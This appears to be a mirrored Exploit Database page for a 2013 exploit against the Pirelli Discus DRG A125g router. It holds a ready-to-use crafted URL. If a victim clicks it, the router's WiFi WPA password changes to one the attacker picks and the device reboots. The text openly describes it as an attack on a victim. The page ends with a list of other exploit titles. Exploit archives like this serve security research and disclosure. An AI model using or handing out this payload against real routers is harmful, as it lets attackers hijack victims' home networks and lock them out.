Pirelli Discus DRG A125g – Remote Change WiFi Password

Exploit Database
91 阅读

作者： Sebastián Magof

日期： 2013-11-24
类别：
- webapps
平台：
- hardware
来源：https://www.exploit-db.com/exploits/29796/

# Exploit Title: Pirelli Discus DRG A125g remote change wifi password
vulnerability
# Hardware: Pirelli Discus DRG A125g
# Date: 2013/11/23
# Exploit Author: Sebastián Magof
# Tested on: Linux/Windows
# Twitter: @smagof
# Greetz: Family, friends && under guys.
# Special Greetz:
# (\/)
# (**) αlpha
#(")(")


#Exploit:

http://10.0.0.2/wladv.wl?wlSsidIdx=0&wlHide=0&wlAuthMode=psk2&wlAuth=0&wlWep=disabled&wlWpaPsk=PASSWORDHERE&wlWpaGtkRekey=0&wlKeyBit=1&wlPreauth=1&wlWpa=tkip

#info: where the parameter wlWpaPsk=PASSWORDHERE is where we will enter the
password we want to put the victim wifi. If the victim clicks on the url
your modem / router will reboot automatically with the new password
provided by the attacker.

last Exploits
Pirelli Discus DRG A125g – Remote Change WiFi Password的更多信息

User Management System 2.0 – Authentication Bypass：
Joomla! Component JB Visa 1.0 – ‘visatype’ SQL Injection：
Fork CMS 3.x – ‘/private/en/locale/index?name’ Cross-Site Scripting：
Joomla! Component com_gurujibook – SQL Injection：
FlexNet Publisher 11.12.1 – Cross-Site Request Forgery (Add Local Admin)：
FS Trademe Clone 1.0 – ‘search’ / ‘id’ SQL Injection：
Nimble Professional 1.0 – Cross-Site Request Forgery (Update Admin)：
i-doit 1.12 – ‘qr.php’ Cross-Site Scripting：